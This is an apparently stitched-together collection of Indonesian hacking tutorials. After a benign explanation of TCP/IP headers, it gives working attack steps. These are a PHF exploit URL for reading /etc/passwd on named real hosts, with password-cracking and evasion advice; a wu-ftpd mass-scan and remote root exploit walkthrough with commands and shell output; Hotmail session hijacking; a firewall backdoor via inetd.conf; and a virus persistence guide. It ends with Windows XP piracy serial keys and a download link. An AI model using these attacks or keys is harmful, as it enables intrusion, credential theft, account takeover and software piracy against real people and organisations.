datagram, datagram yg pertama mungkin akan bernomor urut 0, kedua 500,
ketiga 1000, selanjutnya 1500 dan eterusnya. Kemudian semua susunan
oktet didalam datagram akan diperiksa keadaannya benar atau salah, dan
biasa disebut dg checksum. Hasilnya kemudian diletakan ke header TCP.
Yg perlu diperhatikan ialah bahwa checksum ini dilakukan di kedua
komputer yg melakukan hubungan. Jika nilai keberadaan susunan oktet
antara satu checksum dg checksum yg lain tidak sama, maka sesuatu yg
tidak diinginkan akan terjadi pada datagram tersebut, yaitu gagalnya
koneksi (lihat bahasan sebelumnya). Jadi inilah bentuk datagram
tersebut:
++++++++++++++++++++++++++++++++++++++++++++++++
+ Source Port + Destination port +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Sequence number +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Acknowledgment number +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Data + |U|A|P|R|S|F| +
+ offset+ Reserved|R|C|S|S|Y|I| Window +
+ + |G|K|H|T|N|N| +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Checksum | Urgent pointer +
++++++++++++++++++++++++++++++++++++++++++++++++
+ data anda ------ sampai 500 oktet berikut +
+ ------------ +
Jika kita misalkan TCP header sebagai T, maka seluruh file akan
berbentuk sebagai berikut :
T---- T---- T---- T---- T---- T---- T---- T---- T---- T---- T----
Ada beberapa bagian dari header yg belum kita bahas. Biasanya bagian
header ini terlibat sewaktu hubungan berlangsung.
- Seperti 'acknowledgement number' misalnya, yg bertugas untuk menunggu
jawaban apakah datagram yg dikirim sudah sampai atau belum. Jika tidak
ada jawaban (acknowledgement) dalam batas waktu tertentu, maka data akan
dikirim lagi.
- Window berfungsi untuk mengontrol berapa banyak data yg bisa singgah
dalam satu waktu. Jika Window sudah terisi, ia akan segera langsung
mengirim data tersebut dan tidak akan menunggu data yg terlambat, karena
akan menyebabkan hubungan menjadi lambat.
- Urgent pointer menunjukan nomor urutan oktet menyusul data yg
mendesak. Urgent pointer adalah bilangan positif berisi posisi dari
nomor urutan pada segmen.
Reserved selalu berisi nol. Dicadangkan untuk penggunaan mendatang.
- Control bit (disamping kanan reserved, baca dari atas ke bawah). Ada
enam kontrol bit :
a. URG, Saat di set 1 ruang urgent pointer memiliki makna, set 0
diabaikan.
b. ACK saat di set ruang acknowledgement number memiliki arti.
c. PSH, memulai fungsi push.
d. RST, memaksa hubungan di reset.
e. SYN, melakukan sinkronisasi nomor urutan untuk hubungan. Bila diset maka
hubungan di buka.
f. FIN, hubungan tidak ada lagi.
3. IP
-----
TCP akan mengirim setiap datagram ke IP dan meminta IP untuk
mengirimkannya ke tujuan(tentu saja dg cara mengirimkan IP alamat
tujuan). Inilah tugas IP sebenarnya. IP tidak peduli apa isi dari
datagram, atau isi dari TCP header. Tugas IP sangat sederhana, yaitu
hanya mengantarkan datagram tersebut sampai tujuan (lihat bahasan
sebelumnya). Jika IP melewati suatu gateway, maka ia kemudian akan
menambahkan header miliknya. Hal yg penting dari header ini adalah
source address dan Destination address, protocol number dan
checksum. source address adalah alamat asal datagram. Destination
address adalah alamat tujuan datagram (ini penting agar gateway
mengetahui ke mana datagram akan pergi). Protocol number meminta IP
tujuan untuk mengirim datagram ke TCP. Karena meskipun jalannya IP
menggunakan TCP, tetapi ada juga protokol tertentu yg dapat menggunakan
IP, jadi kita harus memastikan IP menggunakan protokol apa untuk
mengirim datagram tersebut. Akhirnya, checksum akan meminta IP tujuan
untuk meyakinkan bahwa header tidak mengalami kerusakan. Yang perlu
dicatat yaitu bahwa TCP dan IP menggunakan checksum yang berbeda.
Berikut inilah tampilan header IP :
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ version + IHL + Type of Service + Total Length +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ identification + Flag + Fragment Offset +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Time to live + Protocol + Header Checksum +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Source Address +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Destination Address +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ TCP header, kemudian data ------- +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Jika kita misalkan IP header sebagai I, maka file sekarang akan
berbentuk :
IT---- IT---- IT---- IT----- IT----- IT----- IT----- IT----
Selanjutnya berikut ringkasan mengenai bagian header yg belum dibahas :
a. Total length, merupakan panjang keseluruhan datagram dalam oktet,
termasuk header dan data IP.
b. Identification, digunakan untuk membantu proses penggabungan kembali
pecahan-pecahan dari sebuah datagram.
c. Flag,berisi tiga kontrol flag.
- bit 0, dicadangkan, harus 0.
- Bit 1, tidak boleh pecah.
- Bit 2, masih ada fragment lagi.
d. Fragment offset, menunjukan posisi fragment di dalam datagram.
e. Time to live, menunjukan batas waktu maksimal bagi sebuah datagram
untuk berada pada jaringan.
f. Option, lihat RFC 791.
BELAJAR HACKING : INSTANT SHELL UNIX
sambil praktek tapi nggak mampu beli/install UNIX dengan memanfaatkan eksploit yang udah
cukup uzur cuman masih lumayan ampuh.
Bahan-bahan yang diperlukan:
- Web Browser (Netscape 3.0 disarankan karena cepat)
- Program Cracker (gunakan crackerjack atau star cracker)
- Daftar kata (Wordlist/Dictionary). Favorit gue sih GlobalKOS KOSdict.
Sekitar 11.2 MB uncompressed!
- Komputer UMUM (yang nggak bisa di-trace)
- Komputer nganggur (sekitar 6 jam untuk file passwd ukuran medium). untuk yang satu ini nggak
mesti umum punya sebab fungsinya hanya untuk meng-crack
Prakteknya:
- Jalankan browser di komputer umummu (perpustakaan, rental)
- buka window baru (kita sebut window #2)
- dari window lama (window #1) jalankan altavista
- cari target-target potensial. Untuk yang satu ini penjelasan sedikit:
Target yang paling empuk adalah site-site akademis. Paling lezat kalau site-site akademis tsb
terletak di luar negeri. Paling yahud yang ada di negeri yahudi (israel) sebab Indonesia dan israel
tidak punya hubungan diplomatik maupun perjanjian deportasi. JANGAN coba-coba mengehack server milik
pemerintah Indonesia! Kalian nggak akan mendapat ampun! Nah, jika kamu sudah punya sesuatu dalam
pemikiran, contoh: site-site akademis di israel (domain= ac.il) maka
- di altavista, ada kolom yang berjudul "Search the web for ..." kamu isi
dengan: host:ac.il , lalu pilih "search"
- altavista akan menampilkan daftar server server yang memenuhi kriteria search kamu. modifikasi
sekeinginan hati. contoh: Untuk mendapatkan daftar target dari domainnya universitas Tel Aviv,
ketik host:tau.ac.il kamu akan dapetin nama nama webserver yang ada di sono. jadi kira-kira
akan muncul webpage dari server yang namanya www.tau.ac.il, www.cs.tau.ac.il dll. kalo kamu ngisi
host:co.jp maka yang akan ditampilin adalah host-host komersial di jepang (dlsb)
- pergilah ke Window #2. di kolom: "Location:" ketiklah:
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
jangan lupa mengganti nama target dengan salah satu site yang terdapat di daftar sites kamu
dari window #1 contoh:
http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
(percuma ngegunain host yang ada di contoh, file passwdnya kecil banget!)
- Kemungkinan ada empat:
1. Error message ... (dalam kasus ini, maka cukup kembali ke daftar target dan coba
target berikutnya.
2. Smile, you're on candid camera! (dalam kasus ini, informasi mengenai kamu direkam, nomor
ip dicatat dan akan disimpan di server! Hati-hati sebab kamu udah di-log, dan bisa di-trace!
Karena itu pakailah kondom dan gunakan KOMPUTER UMUM! dalam kasus ini kamu cuman bisa
ngusep-ngusep dada aja, deh!)
3. muncul tulisan yang menyerupai bentuk dibawah:
root:*:0:0:System Administrator:/:/bin/csh
sysadm:*:1:1: Bokeph Memendez:/usr/adm:/bin/bash dll dll.
perhatikan bahwa setelah tanda titik dua yang pertama, SELALU muncul tanda asterisk (*).
ini artinya kamu berhasil mendapatkan file passwd hanya saja sayangnya sang file sudah di-shadow
(nggak bisa dibaca oleh sembarang orang, perlu pangkat ROOT (tuhan) untuk ngebacanya!) Well, terpaksa
lanjutkan ke daftar target berikutnya ....
4. muncul tulisan yang menyerupai bentuk dibawah:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh dll dll.
(Dalam kasus ini : CREEET! Dapet deh tuh file passwd asli! tanpa shadow!)
- Nah segera setelah file passwd didapatkan, "Save As" dan simpan di tempat yang aman!
- Terserah boleh kalo mau lanjutin ke target berikut atau segera meng-crack
- pastikan komputer untuk nge-crack aman dan bisa dibiarin nganggur selama berjamjam atau kalo
file passwdnya emang besar, berhari hari.
- jalankan program crack, gunakan wordlist atas file passwd yang baru kamu panen.
- kalo udah berhasil nge-crack, kamu udah siap untuk memakai shell unix 'baru' mu!
telnet aja ke servernya (jangan lupa pake komputer umum atau gunakan perlindungan (phreak dulu
teleponnya, login ke isp pake punya orang, dll!!!)). Isi dengan login dan passwd yang baru kamu
crack, silakan lihat-lihat sekitar. Kalo ada info menarik, jangan lupa dibagi-bagi!
Jika kamu ingin mengeksploitasi, coba jalankan eksploit-eksploit yang ada untuk mendapatkan root!
Gimana? Gampang khan? kalo enggak bisa, sih , kebangetan banget! Gitu dulu deh! Semoga ada manfaatnya!
Catatan PENTING:
JUNJUNGLAH ETIKA HACKER!!!! Jangan merusak!!! Jika kamu berhasil masuk (dan mendapatkan root).
Jangan, sekali lagi JANGAN jalankan perintah/program apapun yang kamu tidak tahu apa efeknya.
Pelajari bukumu, jalankan perintah-perintah sesuai petunjuk buku. JANGAN coba-coba menjalankan
eksploit tanpa tahu asal usul maupun pengertian mendalam tentang UNIX. Tulisan ini gue tulis dengan
maksud supaya kamu bisa mendapatkan sarana untuk belajar UNIX sebab gue percaya bahwa keinginan untuk
belajar tidak sepantasnya dihalangi oleh faktor ekonomi.
Catatan 1:
File passwd yang kamu dapat masih dalam bentuk terenkripsi, jadi kalo
dilihat:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
| |
nama account |
password terenkripsi/tersandi
cara kerja program cracker adalah kurang lebih seperti ini:
1. baca kata #1 dari file kamus/wordlist
2. enkripisi dengan algoritma DES
3. baca baris 1 dari file passwd (account 1), baca nama account dan passwd terenkripsi
4. bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
5. ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.
catatan 2:
domain domain yang terkenal empuk:
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) dll dll.
BELAJAR HACKING : Bagaimana Menggunakan (wu-ftpd) Remote EXploit Script Kiddies
Script Kiddies
Pemberitahuan :
1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa
saja yang ingin mengembangkan pengetahuan networking/internet mereka.
2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikel
ini.
3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penulis
eksploit/script dengan harapan pembaca juga tetap menyertakan kredit
untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script
dengan nama anda dengan harapan nanti dianggap hacker.
Akhirnya! ... setelah lama menimbang2 saya memutuskan melepas artikel ini
demi kejayaan para script kiddies ;P dan supaya script kiddies lainnya
tidak merasa bahwa cuma mereka doang yang jagoan ... hehehe.
Nah ... mulai darimana kita? ... mmm ... singkat saja remote exploit
adalah program/eksploit yang jika dijalankan dari mesin kamu dengan
sasaran server tertentu, akan mengakibatkan anda mendapatkan root shell
di mesin/server sasaran yang berarti kamu mempunyai akses root dimesin
tsb (asik ya?) ini yang disebut cracking (beberapa kiddie menyebutnya
hacking ... tapi bukan itu namanya yg benar cracking ... hehehe) dan yang
make eksploit itu disebut script kiddie :P~
BTW ... semua instruksi ini harus dijalankan di mesin linux/*nix.
A. Mass Target Scanning
Untuk bisa mendapatkan sasaran tentu saja kita harus punya daftar IP yang
akan di crack ... ya kan? ... nah daftar IP itu bisa saja berupa kumpulan
IP yang kamu sudah tahu atau punya teman2 kamu dan kamu simpan di satu
file.
Tapi untuk mudahnya kita bisa menggunakan program ADMz0ne dari ADM Crew
untuk mendapatkan daftar IP yang kita inginkan.
1. Download precompiled binary program z0ne dari site Kecoak
2. Kalau anda download precompiled jangan lupa : ~$ chmod +x z0ne
3. Misalnya kamu ingin dapat list IP dari
a. Phillipines (.ph) :
nohup ./z0ne -o ph > ph.log &
b. Site Commercial di Afrika Selatan
nohup ./z0ne -o co.za > co.za.log &
c. Dan lain-lain ... coba bereksperimen dengan domain
Note : nohup dan & di awal dan akhir perintah adalah untuk
membackground proses scanning, ketik : man nohup kalo ingin tahu
lebih banyak.
4. Untuk contoh ini misalnya anda berhasil mendapatkan list IP dari
Phillipines (.ph) dan disimpan di file ph.log
Isinya kira2 seperti berikut ini :
~$ cat ph.log
210.23.230.195
210.23.234.33
210.23.234.65
210.23.230.193
203.167.64.2
203.167.64.3
---dst---
B. Scanning server yang mempunyai wufptd hole
1. Download precompiled binary program wu-scan dari site Kecoak
2. Atau anda bisa download source nya wu-scan.c kemudian compile:
gcc -o wu-scan wu-scan.c
3. Kalau anda download precompiled jangan lupa : ~$ chmod +x wu-scan
4. Scan IP list yang sudah didapat sebelumnya (ph.log)
nohup ./wu-scan ph.log &
5. Hasil akhirnya akan dituliskan di file wu-scan.log
Hasilnya kira2 seperti ini :
210.23.234.42: wu-2.6.0(1)
203.176.29.195: wu-2.6.0(1)
208.160.224.133: Vulnerable wu-2.6.0(1) running on RH 6.2
IP yang bisa di crack adalah yang ada tulisan Vulnerable blah ;)
Untuk mudahnya kamu bisa menaruh IP yg vulnerable di satu file lain
misalnya ph.vul
~$ cat wu-scan.log | grep Vulnerable > ph.vul
C. Cracking ... let's party!
1. Download precompiled binary program wuftpdsp dari site Kecoak
2. Atau anda bisa download source nya wuftpdsp.c kemudian compile:
gcc -o wuftpdsp wuftpdsp.c
3. Kalau anda download precompiled jangan lupa : chmod +x wuftpdsp
4. Untuk me-remote exploit 208.160.224.133 ketik :
./wuftpdsp -s0 -t 208.160.224.133
--- ini yg akan keliatan di layar ---
Target: 208.160.224.133 (ftp/
2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
blah ...
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
--- habis ---
6. Kamu bisa coba beberapa perintah standar seperti ls :P~ di root shell
kamu yang baru, atau perintah lain yang agak bermanfaat ;) seperti
cat /etc/passwd dan cat /etc/shadow
7. Dan seperti pesan nya tekan CTRL dan \ kalau ingin keluar dari root
shell (dan kembali ke shell di mesin kamu sendiri.
8. Selain itu? kan ada trojan/backdoor dll, begitu mungkin kamu bertanya
ehm ... ikuti saja Script Kiddies Tutorial berikutnya dan menjauhlah
dari masalah ... OK?
D. wu-ftpd eksploit lain.
Buat yang masih penasaran dengan hasil wuftpdsp, coba gunakan wu-ftpd
eksploitnya TESO Team - 7350wu
Cara pakainya kamu cari sendiri ... anggap saja PR.
HackinG Hotmail
pengen belajar. Ini nih mah gak buat yang udah pengalaman yang udah tau.
Kecuali emang lagi pengen baca. =-)
Artikel ini berisi informasi mengenai Hotmail free internet based e-mail dan
bagaiman untuk mendapatkan access ke semua account lainnya (Yah ... tidak
semua sih =-P ).
==================
==Latar Belakang==
==================
Hotmail adalah sebuah i-mil system berbasis web. Yang cgi-bin sebagai
sebuah gateway ke mesin-mesin lokal dimana semua password dan e-mail
di simpan.
Hotmail akan meminta kamu masukin login pada satu page dan password pada
page lainnya, Nah ini yang jadi kunci pertama dari metode buat nge'hack.
Ketika ada dalam account Hotmail, ada banyak pilihan, kayak reading mail,
deleting mail, dll
Nah pilihan terakhir adalah logout option, yang merupakan kunci kedua dari
metode nembus-in. Untuk itu kamu mesti tau user name dari subject/victim.
User name ini mah nama diawal tanda @ di alamat i-mil mereka, so
mudah aja didapat. Kamu juga musti make browser yang bisa nampilin source
code dari page yang sedang kamu liat. Yup, cuman itu yang dibutuhkan selain
subject nya mesti bloon bener, entah lupa pa gak peduli buat logout
sekali mereka udah masuk dalam system. Nah ini nih kunci buat
nge'hacknya!!!!!!
Pokoke gimana caranya supaya si-subject gak logout, terserah =-)
===========
==Caranye==
===========
Sekarang langkah-langkah buat nge-hacknya ......
langka1
Langkah pertama adalah untuk mendapatkan username dari 'subject'
trus buka web browser ke http://www.hotmail.com dan login dengan user name
itu.
Pasti-in kalo kamu udah bener nulis username soalnye hotmail gak bakalan
ngasih tauk kalo kamu ngisinya gak bener, Hotmail akan me-log IP dari orang
yang memasukkan nama login yang salah.
Langkah 2
Sekarang liat source code dari password page yang kamu masukin. Pada URL box
browser kamu bakalan keliatan seperti ini ->
www.hotmail.com/cgi-bin/password.cgi
Liat source codenya. Cari yang pada souce code page tersebut, yang kayak ini :
form name="passwordform" action="URL" method="POST" target="_top"
Nah itu tuh baris yang penting .... Nah ada sedikit cerita sedikit, sebelum
gue dilanjutin.
Sebelum ngasih tauk kamu bagaimana menggunakan satu baris tulisan pada source
code tsb, Gue ceritain sedikit mengenai teori dibalik metode nge'hack ini.
Soalnya 'gak ada artinya hacking, kalo kamu tidak tau bagaimana cara kerjanya.
don'tItulah maksud utama dari hackin', buat nyari tau bagaimana cara kerja
system.
Nah jadi ..., ketika kamu login ke hotmail, gateway cgi-bin bakalan nandai
bahwa kamu udah masuk ke systemnya.
Jadi jika kamu gak logout, dan kamu cuman ninggalin page tersebut, atawa cuman
matiin komputer-mu, system Hotmail 'gak tauk kalo kamu tuh udah 'cabut' dari
account-mu. Oke, kembali pada 'tujuan' semula.
Action "URL" pada tulisan sebelumnya merupakan lokasi dari account username.
Jadi setelah pemilik asli account udah loged in dan ngisi passwordnya
dia bakalan masuk ke page yang bunyinya URL box-nya kayak gini :
http://suatu-nomer/cgi-bin//start/username/suatu-nomer
//////////
Langkah 3
/////////
Hmmmmm...funny thing, nomer tersebut merupakan nomer yang kita liat pada
source code dari password page.
Jadi setelah kamu punya URL box, kamu musti nulis itu pada URL box aja!!!!
Kamu gak bisa buka page tersebut dengan open button, atau gunain open command
karena ini intinya tulisan ini. Jadi setelah kamu masuk ke URL tersebut,
pencet enter, dan liat aja hotmail bakalan ngasih kamu acces lengkap
atas account dari subject Hotmail.
Perlu diingat kalo nge'hack begini CUMAN bisa bekerja hanya kalo pemilik
account gak logout dari account-nya.
Dan juga, tolong punya sedikit belas kasihan pada si bloon malang di ujung
sana yang punya account, dan jangan menghapus pesan apapuns atau tindakan
nge'rusak lainnya. Be happy aja soalnya kamu UDAH bisa access ke account tsb,
abis itu tinggalin aja...
BELAJAR HACKING : Bermain dengan Firewall Default
penjaga keamanan dari sebuah network yang tidak mungkin ditembus.
Sayangnya (atau untungnya - tergantung persepsi anda), banyak
administrator sistem yang malas dan mengandalkan instalasi 'default' yang
diterima (out of box).
Firewal-firewall seperti inilah yang mempunyai banyak kelemahan. Artikel
ini ditujukan untuk mereka yang sudah punya akses di dalam firewall, dan
membutuhkan jalan untuk mencapai akses tersebut melalui jaringan luar
(internet, contohnya). Platform yang digunakan adalah Linux dan untuk
UNIX-UNIX lainnya, cara kerja hampir sama.
Misalkan workstation anda di kantor menyimpan segala pekerjaan anda. Namun
sayangnya LAN di kantor dilindungi oleh sebuah Firewall. Anda ingin akses
ke workstation di kantor supaya anda bisa menyelesaikan pekerjaan dari
rumah atau tempat lain. Nah, disinilah bergunanya teknik 'firewall
bypassing'.
# port
/-------\ /-------\<------------ telnet (23)
| | | |<------------ ftp (21) /--------\
|kotak. |<-------| fire |<------------ ssh (22) INTERNET
|linux. | 25 | wall |<------------ www (80)
|anda |<-------| |<------------ mail (25) \--------/
| | <1024 \-------/ <----------- imap (143)
\-------/
( ilustrasi lalu lintas data dari internet ke kotak linux anda dengan
melewati firewall)
Instalasi firewall secara default biasanya mengizinkan koneksi ke port 25
(SMTP - protokol transfer e-mail), dan sebagian besar koneksi ke port
dengan nomor lebih besar daripada 1024. Memang banyak sysadmin yang
mengabaikan hal ini, ataupun jika ada yang tahu, biasanya hanya dibiarkan
saja, sebab koneksi keluar server biasa menggunakan lokasi-lokasi dengan
nomor port >1024.
Cara yang paling cepat untuk mengakali sang firewall agar bisa menerima
koneksi telnet dari luar adalah dengan mengubah setting skema portmapping
Linux anda. Edit file /etc/inet.conf anda, dan cari entri yang berisi
smtp stream tcp nowait root
dan ubah isinya menjadi
smtp stream tcp nowait root /usr/sbin/tcpd in.telnetd
Aha. Tinggal anda reload file inetd.conf, dan kill sendmail. Sekarang port
email anda sudah siap untuk menerima koneksi telnet (bisa langsung anda
'telnet mesin.target.net 25').
Cara yang lain untuk memperoleh hasil yang sama (tanpa mengorbankan
sendmail), adalah dengan mengubah setting port penerima telnet (port 23),
dan memberitahukan mesin anda agar menerima telnet lewat port diatas 1024.
Buka file /etc/services dan cari entri yang berisi
telnet 23/tcp
dan ubah isinya menjadi
telnet 1069/tcp
(atau port lain >1024 pilihan anda).
Cara ini akan membuka jalan telnet untuk masuk lewat port 1069 tanpa
menghiraukan proteksi firewall. Tentu saja anda perlu mengulang inetd dan
sebagainya, namun anda tidak perlu membunuh mail server anda. Cara ini
tentu saja tidak terbatas ke penggunaan telnet biasa. Daemon-daemon
seperti rsh, dan secure shell daemon bisa juga digunakan untuk menerima
koneksi selain dari port defaultnya (ssh port 22).
Nah, begitu dulu sedikit penjelasan ini. Pasti diantara anda banyak yang
masih bingung atau masih mencari-cari jalan masuk ke mesin terlindung
firewall tanpa akses fisik ke target. Saran penulis adalah agar anda
mencoba-coba menjalankan program 'scanner' seperti nmap (tersedia di arsip
kecoak). Jika kebetulan mesin target anda menjalankan web server, maka
bisa juga anda coba bermain dengan port http (80), atau mencoba mencari
kelemahan di cgi-bin nya. Teknik yang lebih sukar lagi adalah fragmentasi,
dan penulis sendiri pun masih buta akan hal ini. Semoga artikel ini
bermanfaat dan ada pembaca yang bisa mengembangkan teknik-teknik lebih
baru lagi.
BELAJAR HACKING : Apakah cokie dan mengapa ada di hard disk anda
di hard disk anda. Server web melakukannya melalui browser web (itu sebabnya mengapa
cookie sering kali disebut cookie browser). Cookie biasanya terdiri dari satu baris
informasi. Informasi informasi ini disimpan dalam sebuah file bernama cookies.txt,
disalah satu sub-folder browser anda.
Cookie digunakan oleh server web (komputer yang menampung situs web) untuk meletakkan
informasi di hard disk anda. Tipe informasi ini mencakup, namun tidak terbatas pada,
user ID dan password, tanggal dan waktu anda mengunjungi situs web, halaman yang
ditampilkan, dan banyak lagi.
Sejumlah pengguna cookie menguntungkan pengunjung situs web. misalnya, sebuah user ID dan
password yang disimpan pada file cookies.txt bisa membawa anda ke sebuah situs yang meminta
informasi ini tanpa anda harus mengetikkannya setiap kali. Sebuah daftar preferences untuk
sebuah situs web yang berisi cookie bisa mengkustomasi penampilan informasi. Cookie juga
digunakan untuk menyimpan item pada kereta belanja virtual. (jika anda pernah mengunjungi
sebuah situs belanja dan memesan sejumlah item, lalu meninggalkannya tanpa melengkapi pemesanan
anda, lalu kembali dilain waktu dan mendapatkan daftar item yang sudah anda pilih sebelumnya,
ini berkat informasi yang disimpan pada file cookies.txt untuk 'membuat kembali' daftar belanja
anda).
Demikian juga, file file ini mungkin menyimpan catatan halaman apa yang telah andakunjungi
disebuah situs, lalu menggunakan informasi ini untuk mengingatkan server untuk memberikan anda
acces ke halaman halaman baru dan melarang acces ke halaman halaman yang sebelumnya telah
dikunjungi. Setup seperti ini mungkin digunakan untuk mengumpulkan dan menyimpan data survei
(poll), yang mencegah setiap orang mengikuti survei 2 kali.
File cookies.txt ditampilkan pada setiap server yang memintanya. Namun, banyak informasi pada
sebuah cookie hanya berguna bagi server yang menempatkan cookie tersebut, atau bagi server
lain yang oleh pemilik/penulis cookie diberi ijin untuk menggunakan informasi tersebut.
File cookies.txt adalah file text ASCII 7-bit. Anda bisa membuka file dengan program pengolah
kata. bentuknya akan tampak seperti ini:
contoh:
#Netscape HTTP Cookie file
#http://www.netscape.com/newsref/std/cookie_spec.html
#This is generated file! Do not edit.
.amazon.com TRUE / FALSE 2082787568 x-main nIDfTAYzJDky5V6rp9
K6UZsS915ULEq4
.amazon.com TRUE / FALSE 2082787240 ubid-main
077-2649831-7662731
ad1.impulsebuy.net FALSE / FALSE 1072914778 IASIDX
Anda melihat kata, 'do not edit' di dekat akhir file. pengeditan file ini akan membuatnya tidak
berguna. Jika anda menggunakan file cookie untuk menyimpan password dan informasi lain yang
berhubungan dengan cara anda menggunakan sebuah situs web, anda tentu tidak boleh mengedit file
ini. Jika anda melakukannya, server disitus web yang dimaksud tidak akan bisa membaca informasi
yang disimpan pada file cookie, sehingga informasi tersebut tidak akan bisa diisikan secara
otomatis untuk anda ketika anda mengunjungi situs tersebut. Namun, juka anda mengedit file
tersebut, anda akan tetap bisa mengakses situs tersebut dengan memasukkan ID dan password anda
secara manual. seperti mungkin anda sudah duga, cookies.txt berisi informasi tempat tempat yang
sudah anda kunjungi. Sehingga, anda mungkin perlu untuk sepenuhnya menonaktifkan cookies, kalau
kalau seorang 'pengintip' di PC anda memutuskan untuk melihat file cookies.txt
Udah jelas khan? apa mungkin saya yang terlalu panjang lebar, (males banyak bacot!)
Ada dua pendekatan untuk menghentikan/memblock cookie. yang pertama langsung, dan mencakup
penghapusan file cookies.txt. lainnya menggunakan fasilitas yang disediakan netscape dan
microsoft internet explorer/IE untuk menghentikan atau mengontrol cookie.
Salah satu pendekatan untuk menangani cookie adalah dengan menghapus atau mengedit file bernama
cookies.txt yang oleh browser anda diletakkan di hard disk anda. saya tidak merekomendasikan hal
ini karena ini sangat membuang waktu, dan anda harus menghapusnya, atau mengubahnya setiap
kali selesai mem-browse web.
Namun, jika anda ingin mengontrol cookie dengan cara ini --atau hanya ingin melihat apa yang ada
di file tersebut-- ini merupakan langkah sederhana. Bergantung pada setup PC anda, browser yang
anda gunakan, dan versi browser, file ini bisa diletakkan pada salah satu dari beberapa
direktori; jadi anda harus mencari terlebih dahulu.
Untuk mencari cookies.txt, gunakan fasilitas pencarian computer anda. Klik find pada menu start,
lalu klik Files atau Folders. Anda akan melihat kotak dialog find. lalu masukkan kata cookies.txt,
dan klik find now atau tekan enter untuk mengetahui lokasi file cookies.txt anda bisa menghapus
atau menampilkan file dari dialog ini menggunakan menu klik kanan.
Panduan Membuat Virus : Infeksi System
Komputer). Maka yang pasti dilakukan virus tersebut setelah bangkit dari tidurnya
adalah menginfeksi system yang ada pada computer target agar virus tersebut melekat
pada computer target. Sehingga meskipun komputer tersebut telah di-restart virus
tersebut akan tetap aktif dikomputer target tersebut.
Cara kerja virus menginfeksi system:
1. Melakukan penggandaan ke system.
Langkah pertama sekali yang dilakukan oleh kebanyakan virus ketika user
menjalankan virus dikomputernya adalah melakukan penggandaan kesistem
user tersebut. Proses penggandaan ke system tersebut berfungsi agar virus
tetap aktif pada saat computer direstart. Biasanya hasil penggandaan ke
system mempunyai nama yang hampir dengan nama file system dan ada juga
yang sama dengan nama file system hanya saja lokasi file tersebut berbeda
dengan file aslinya. Contoh (winlogon.exe, lsass.exe, services.exe, csrss.exe,
iexplorer.exe, shel .exe, dll).
2. Menyeting registry.
Setelah virus tersebut berhasil menggandakan dirinya kesistem barulah virus
tersebut menggunakan registry sebagai benteng pertahanan. Kok
menggunakan registry, seharusnya virus kan mampu melindungi dirinya sendiri
tanpa bantuan registry? Benar, Tapi meskipun begitu banyak sekali
kemungkinan virus tersebut dapat ditanggulangi oleh Antivirus atau software
sejenisnya. Tapi dengan meminjam bantuan registry dari system operasi maka
virus tersebut tersebut dapat melindungi dirinya dengan sangat baik.
Dikarenakan kunci system operasi ada pada registry. Dengan bantuan registry
ini virus mampu menjalankan dirinya kedalam mode safe-mode ataupun
kedalam mode safe-mode dos sekalipun. Dan melalukan pengaturan agar virus
tersebut tetap dalam keadaan tidak terlihat sehingga menyulitkan user untuk
menghapus virus tersebut secara manual.
3. Mengaktifkan virus yang telah berada disistem.
Setelah virus telah melakukan penggandaan ke system dan menyeting registry
maka yang dilakukan virus selanjutnya adalah menjalankan virus telah ada
disistem sehingga meskipun flashdisk atau pun disket tersebut dikeluarkan
maka virus tersebut akan tetap aktif.
Trik Merubah Windows XP menjadi GENUINE (Asli)
bukan berarti windows XP bajakan itu bukan asli (GENUINE). Yang membedakan asli atau tidaknya
windows XP ternyata terletak pada serial number yang digunakan ketika proses menginstall windows
XP.
Untuk mentes apakah windows XP kita asli, coba gunakan tool “Microsoft Genuine Advantage
Diagnostic Tool”, yang dapat mendetaksi keaslian windows XP anda, contohnya gua peke windows
bajakan tapi menggunakan serial number yang genuine so, tool “Microsoft Genuine Advantage
Diagnostic Tool” bilang kalo windows xp yang gua pake itu Asli, ini buktinya :
Download Tool Genuine disini :
http://unrated.110mb.com/Tool.zip
Kalo ternyata windows XP yang kita gunakan bukan genuine, so gak perlu kawatir. Gua dah dapet 3
serial number windows Xp yang udah terbuakti genuine :
V2C47-MK7JD-3R89F-D2KXW-VPK3J
H689T-BFM2F-R6GF8-9WPYM-B6378
WCBG6-48773-B4BYX-73KJP-KM3K3
